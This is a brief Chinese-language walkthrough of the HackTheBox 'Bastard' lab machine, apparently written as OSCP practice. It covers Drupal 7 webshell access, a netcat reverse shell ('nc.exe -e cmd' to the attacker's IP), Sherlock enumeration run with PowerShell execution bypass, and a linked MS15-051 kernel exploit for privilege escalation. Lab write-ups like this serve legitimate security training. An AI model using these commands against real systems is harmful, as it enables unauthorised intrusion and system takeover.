oscp——HTB——Bastard

0x00 前言

难度

入门1级
oscp——HTB——Bastard_第1张图片

0x01 信息收集

oscp——HTB——Bastard_第2张图片

0x02 Web——Webshell

这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell
oscp——HTB——Bastard_第3张图片
使用脚本直接getshell
oscp——HTB——Bastard_第4张图片

0x03 Webshell——Rootshell

传一个nc 上去然后反弹一个shell

nc.exe -e cmd 10.10.14.6 1234

这里可以使用Sherlock先进行扫描。

powershell.exe -exec bypass -Command "& {Import-Module C:\inetpub\drupal-7.54\Sherlock.ps1;Find-AllVulns}

oscp——HTB——Bastard_第5张图片

这里先试了一下ms16-032,但是好像不起作用。

本来享用msf直接打ms15_051,最后发现msf的是32位的payload,只能在github上下载了。

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/

oscp——HTB——Bastard_第6张图片

然后再回弹一个shell就行

你可能感兴趣的:(oscp)